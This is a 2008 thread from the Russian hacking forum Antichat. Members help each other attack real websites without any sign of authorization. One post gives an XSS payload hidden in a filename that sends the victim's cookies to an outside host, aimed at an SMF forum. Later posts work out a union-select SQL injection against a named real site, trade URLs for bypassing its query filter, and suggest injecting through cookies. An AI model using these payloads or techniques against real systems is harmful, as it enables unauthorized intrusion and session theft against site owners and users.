ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
05.05.2008, 19:48
|
|
Новичок
Регистрация: 28.04.2008
Сообщений: 5
Провел на форуме:
116708
Репутация:
6
|
|
1.Есть форум, Powered by SMF 1.1.x,как узнать х?
2.Надеясь на удачу(что версия <=1.1.4), пробую приаттачить файл со следующим названием:
Код:
abc<img src= .width=1 height=1 onerror=javascriptnew Image().src='http//s.netsec.ru/arm.gif'+document.cookie>.txt
Но выдаётся ошибка:
Код:
default.htm.
Вы не можете отправить этот файл. Доступны только следующие типы файлов doc,gif,jpg,mpg,pdf,png,txt,zip.
|
|
|
05.05.2008, 22:27
|
|
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283
Репутация:
69
|
|
Подскажите это уязвимость или нет?
http://www.intone.ru/get2.php?partner=269&id=89596/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29/*
помоему да, т.к при таком запросе не происходит редирект на главную страницу. Но ни одно из полей не выводится 
---------------------------------------
Извиняюсь сплоховал, менял значения в partner 
Спасибо ZAMUT!!!
Последний раз редактировалось samarin; 05.05.2008 в 22:50..
|
|
|
|
05.05.2008, 22:44
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
samarin, просто замени на несуществующее значение id, -1 к примеру. Вывод есть.
|
|
|
|
06.05.2008, 17:16
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
или
http://www.intone.ru/get2.php?partner=269&id=89596/**/and/**/1=0/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29/*
|
|
|
|
06.05.2008, 19:09
|
|
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283
Репутация:
69
|
|
Вывод то есть, а каким образом вывести что нибудь интересное? ведь доступа к information_schema нету, и намека, хоть на какое-то название таблиц тоже.
Довольно интересный случай (я только учусь и такого еще не встречал).
|
|
|
|
06.05.2008, 19:16
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
фильтруется from
|
|
|
|
07.05.2008, 12:58
|
|
Новичок
Регистрация: 19.03.2008
Сообщений: 6
Провел на форуме:
30775
Репутация:
1
|
|
Сообщение от ZAMUT
фильтруется from
Там не from фильтруется, а последовательность
union select from.
|
|
|
|
06.05.2008, 19:26
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
Там походу фильтры Get-post переменных стоят, ибо как что нормальное в инъекцию прописываешь аля Information_schema.tables, то выдаёт такую байду: "Ваш запрос отвергнут по причине его возможной небезопасности". Хотя классический Union+select даёт вывод в страницу...
|
|
|
|
06.05.2008, 19:29
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
все верно, фильтрация идет при Get/post запросах.
|
|
|
|
06.05.2008, 20:04
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
а через куки? )
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид